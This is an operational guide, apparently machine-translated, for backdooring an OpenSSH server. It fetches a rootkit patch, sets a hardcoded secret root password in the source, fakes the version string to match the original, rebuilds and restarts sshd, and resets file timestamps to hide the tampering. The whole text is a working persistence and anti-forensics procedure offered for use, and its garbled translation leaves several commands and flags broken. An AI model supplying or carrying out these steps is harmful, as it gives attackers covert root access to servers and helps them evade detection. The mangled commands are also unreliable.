-V 1.ssh
# ssh to view the current version information
# OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010
2. Find ssh configuration files
are generally located in / etc / ssh in
Time 3. backup of the original file
backup / etc / ssh file under
assumptions / etc / ssh / sshd_config backup /etc/ssh/sshd_config.old
4.wget the backdoor ssh
#http: //core.ipsecs .com / rootkit / patch-to- hack / ( wall has been) the back door
#http: //openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/ regular ssh source file
# openssh-5.9p1.tar (regular file)
# OpenSSH-5.9p1.path.tar (backdoor file)
5.tar zxf openssh-5.9p1.tar
tar zxf openssh-5.9p1.path.tar
cp openssh-5.9p1.patch/sshbd5.9p1.diff /openssh-5.9p1
cd openssh-5.9p1
patch < sshbd5.9p1.diff
6. Modify ssh information
vi inculdes.h
## the DEFINE SECRETPW "Sky" backdoor password
version.h vi
#define SSH_VERSION "OpenSSH_5.8p1 Debian-1ubuntu3" ssh -V # amended as a first step to view the information
#define SSH_PORTABLE "p1"
7. source compiler
yum the install OpenSSL OpenSSL -Y-PAM-devel devel
./configure -prefix = / = -sysconfdir usr / etc / SSH the -with the -with-PAM-kereros5
# -sysconfdir = / etc / in the second SSH Find the path step
# If you do not set the source and path of the file
#Strings / usr / sbin / sshd | grep etc
# you can see the problem! ! !
An error may occur during compilation:
the configure: error: *** zlib.h Missing - Please install First or the Check config.log
#
# yum install zlib-devel
configure: error: *** Can’t find recent OpenSSL libcrypto (see config.log for details) ***
#
#yum install openssl openssl-devel
make && make install
/etc/init.d/sshd restart
7. Restore the time of the original ssh file
modification file modification time (mtime)
touch -r /etc/ssh/sshd_config.old /etc/ssh/config 等等
8. Test
ssh root @ localhost
backdoor password just set, if the login is successful, represents a set ok!